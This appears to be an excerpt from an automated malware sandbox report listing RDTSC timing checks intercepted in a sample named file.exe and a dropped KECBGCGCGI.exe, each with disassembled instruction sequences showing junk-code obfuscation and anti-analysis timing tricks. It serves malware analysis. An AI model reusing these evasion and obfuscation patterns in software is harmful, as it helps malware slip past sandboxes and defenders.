Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B951 second address: 125B956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B956 second address: 125B98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626C9C9A26h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F626C9C9A36h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F626C9C9A6Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F626C9C9A26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B98B second address: 125B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B98F second address: 125B995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B995 second address: 125B99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125AB8A second address: 125ABA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125AD4D second address: 125AD76 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626D6E9A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jnl 00007F626D6E9A66h 0x00000013 jmp 00007F626D6E9A71h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125AD76 second address: 125AD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125AEA6 second address: 125AEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B1DE second address: 125B1EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F626C9C9A26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125FE57 second address: 125FE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12617E7 second address: 12617FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F626C9C9A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e jc 00007F626C9C9A26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126131D second address: 1261323 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1261323 second address: 126133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a pushad 0x0000000b jp 00007F626C9C9A26h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0323 second address: 54A0332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0332 second address: 54A034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626C9C9A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A034A second address: 54A034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A034E second address: 54A039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ax, A3D9h 0x0000000e mov ecx, 7E65A495h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F626C9C9A39h 0x00000023 and eax, 5D5DA7D6h 0x00000029 jmp 00007F626C9C9A31h 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A042D second address: 54A0431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0431 second address: 54A0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BEC1 second address: 117BEC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A04E7 second address: 54A04ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A04ED second address: 54A04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A04F1 second address: 54A05A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007F626C9C9A38h 0x00000012 or ecx, 58A1F288h 0x00000018 jmp 00007F626C9C9A2Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F626C9C9A34h 0x00000027 sbb ecx, 212954E8h 0x0000002d jmp 00007F626C9C9A2Bh 0x00000032 popfd 0x00000033 call 00007F626C9C9A38h 0x00000038 push eax 0x00000039 pop edx 0x0000003a pop esi 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e pushad 0x0000003f push edx 0x00000040 movzx esi, dx 0x00000043 pop edi 0x00000044 mov ch, F6h 0x00000046 popad 0x00000047 pop ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push esi 0x0000004c pop ebx 0x0000004d pushfd 0x0000004e jmp 00007F626C9C9A30h 0x00000053 adc ecx, 41174CD8h 0x00000059 jmp 00007F626C9C9A2Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0639 second address: 54A0652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0652 second address: 54A0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0656 second address: 54A0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0668 second address: 54A06A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F626C9C9A31h 0x00000008 pop esi 0x00000009 mov bx, DA94h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F626C9C9A2Ah 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F626C9C9A2Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A06A4 second address: 54A06D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d mov eax, 4D195451h 0x00000012 pushad 0x00000013 mov ebx, esi 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 popad 0x0000001a call 00007F62DDB6D39Ah 0x0000001f push 759227D0h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov eax, dword ptr [esp+10h] 0x0000002f mov dword ptr [esp+10h], ebp 0x00000033 lea ebp, dword ptr [esp+10h] 0x00000037 sub esp, eax 0x00000039 push ebx 0x0000003a push esi 0x0000003b push edi 0x0000003c mov eax, dword ptr [759B0140h] 0x00000041 xor dword ptr [ebp-04h], eax 0x00000044 xor eax, ebp 0x00000046 push eax 0x00000047 mov dword ptr [ebp-18h], esp 0x0000004a push dword ptr [ebp-08h] 0x0000004d mov eax, dword ptr [ebp-04h] 0x00000050 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000057 mov dword ptr [ebp-08h], eax 0x0000005a lea eax, dword ptr [ebp-10h] 0x0000005d mov dword ptr fs:[00000000h], eax 0x00000063 ret 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F626D6E9A71h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A06D6 second address: 54A0765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F626C9C9A2Eh 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 pushad 0x00000016 mov edx, ecx 0x00000018 mov bx, si 0x0000001b popad 0x0000001c mov esi, edx 0x0000001e jmp 00007F626C9C9A34h 0x00000023 mov al, byte ptr [edx] 0x00000025 jmp 00007F626C9C9A30h 0x0000002a inc edx 0x0000002b pushad 0x0000002c push esi 0x0000002d pushfd 0x0000002e jmp 00007F626C9C9A2Dh 0x00000033 add esi, 02D92A36h 0x00000039 jmp 00007F626C9C9A31h 0x0000003e popfd 0x0000003f pop esi 0x00000040 movsx edx, si 0x00000043 popad 0x00000044 test al, al 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0765 second address: 54A0769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0769 second address: 54A076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A076F second address: 54A0775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0775 second address: 54A0779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0779 second address: 54A0765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F626D6E99FCh 0x0000000e mov al, byte ptr [edx] 0x00000010 jmp 00007F626D6E9A70h 0x00000015 inc edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pushfd 0x00000019 jmp 00007F626D6E9A6Dh 0x0000001e add esi, 02D92A36h 0x00000024 jmp 00007F626D6E9A71h 0x00000029 popfd 0x0000002a pop esi 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f test al, al 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A078D second address: 54A0791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0791 second address: 54A07A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07A8 second address: 54A07AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07AE second address: 54A07B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07B2 second address: 54A07F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edx, esi 0x0000000a jmp 00007F626C9C9A2Ch 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 jmp 00007F626C9C9A30h 0x00000017 dec edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F626C9C9A37h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07F5 second address: 54A080D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626D6E9A74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A080D second address: 54A0838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [edi+01h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626C9C9A35h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0838 second address: 54A0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626D6E9A6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0848 second address: 54A090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edi+01h] 0x0000000e jmp 00007F626C9C9A36h 0x00000013 inc edi 0x00000014 pushad 0x00000015 mov ax, E49Dh 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F626C9C9A38h 0x00000020 sub esi, 13A1B928h 0x00000026 jmp 00007F626C9C9A2Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F626C9C9A38h 0x00000032 xor esi, 6850EB88h 0x00000038 jmp 00007F626C9C9A2Bh 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 test al, al 0x00000042 jmp 00007F626C9C9A36h 0x00000047 jne 00007F62DCE41BBCh 0x0000004d jmp 00007F626C9C9A30h 0x00000052 mov ecx, edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F626C9C9A2Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A090F second address: 54A0913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0913 second address: 54A0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0919 second address: 54A0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F626D6E9A6Ch 0x00000009 sbb ax, 6B78h 0x0000000e jmp 00007F626D6E9A6Bh 0x00000013 popfd 0x00000014 mov cx, F2AFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b shr ecx, 02h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F626D6E9A6Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0954 second address: 54A095A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A095A second address: 54A0989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsd 0x0000000b rep movsd 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 rep movsd 0x00000013 jmp 00007F626D6E9A70h 0x00000018 mov ecx, edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ecx, edi 0x0000001f mov si, di 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0989 second address: 54A09F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 03h 0x0000000c jmp 00007F626C9C9A36h 0x00000011 rep movsb 0x00000013 jmp 00007F626C9C9A30h 0x00000018 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000001f pushad 0x00000020 mov ecx, 0D1DB60Dh 0x00000025 popad 0x00000026 mov eax, ebx 0x00000028 pushad 0x00000029 mov dx, si 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F626C9C9A2Ch 0x00000034 and ecx, 32514F58h 0x0000003a jmp 00007F626C9C9A2Bh 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09F2 second address: 54A0A4D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F626D6E9A78h 0x00000008 add ecx, 232759B8h 0x0000000e jmp 00007F626D6E9A6Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ecx, dword ptr [ebp-10h] 0x0000001a pushad 0x0000001b mov si, 1A0Bh 0x0000001f mov di, cx 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F626D6E9A74h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0A4D second address: 54A0A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0A5C second address: 54A0A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c jmp 00007F626D6E9A6Ch 0x00000011 pop edi 0x00000012 pushad 0x00000013 mov cl, DFh 0x00000015 jmp 00007F626D6E9A73h 0x0000001a popad 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, 11h 0x00000021 push ecx 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0A95 second address: 54A0AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop ebx 0x0000001b pushfd 0x0000001c jmp 00007F626C9C9A34h 0x00000021 add cx, 07F8h 0x00000026 jmp 00007F626C9C9A2Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0AEB second address: 54A0639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0008h 0x0000000c cmp dword ptr [ebp-2Ch], 10h 0x00000010 mov eax, dword ptr [ebp-40h] 0x00000013 jnc 00007F626D6E9A65h 0x00000015 push eax 0x00000016 lea edx, dword ptr [ebp-00000590h] 0x0000001c push edx 0x0000001d call esi 0x0000001f push 00000008h 0x00000021 jmp 00007F626D6E9A6Eh 0x00000026 call 00007F626D6E9A69h 0x0000002b pushad 0x0000002c movzx eax, bx 0x0000002f pushfd 0x00000030 jmp 00007F626D6E9A73h 0x00000035 sub eax, 1809625Eh 0x0000003b jmp 00007F626D6E9A79h 0x00000040 popfd 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F626D6E9A6Ch 0x0000004a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80DBF2 second address: 80DBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80833E second address: 808385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A79h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F626D6E9A79h 0x0000000e jmp 00007F626D6E9A71h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 808385 second address: 808389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80CE32 second address: 80CE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80CE36 second address: 80CE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80CF69 second address: 80CF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D209 second address: 80D20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D20F second address: 80D213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D3BB second address: 80D3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D518 second address: 80D51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D51D second address: 80D522 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D522 second address: 80D528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D528 second address: 80D54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F626C9C9A2Dh 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F626C9C9A2Ah 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D54E second address: 80D554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80D554 second address: 80D55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 811623 second address: 811627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 811627 second address: 811633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 811633 second address: 811692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F626D6E9A75h 0x0000000b pop edi 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F626D6E9A78h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jp 00007F626D6E9A72h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007F626D6E9A6Ch 0x0000002a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 811692 second address: 81169C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 81187D second address: 811881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
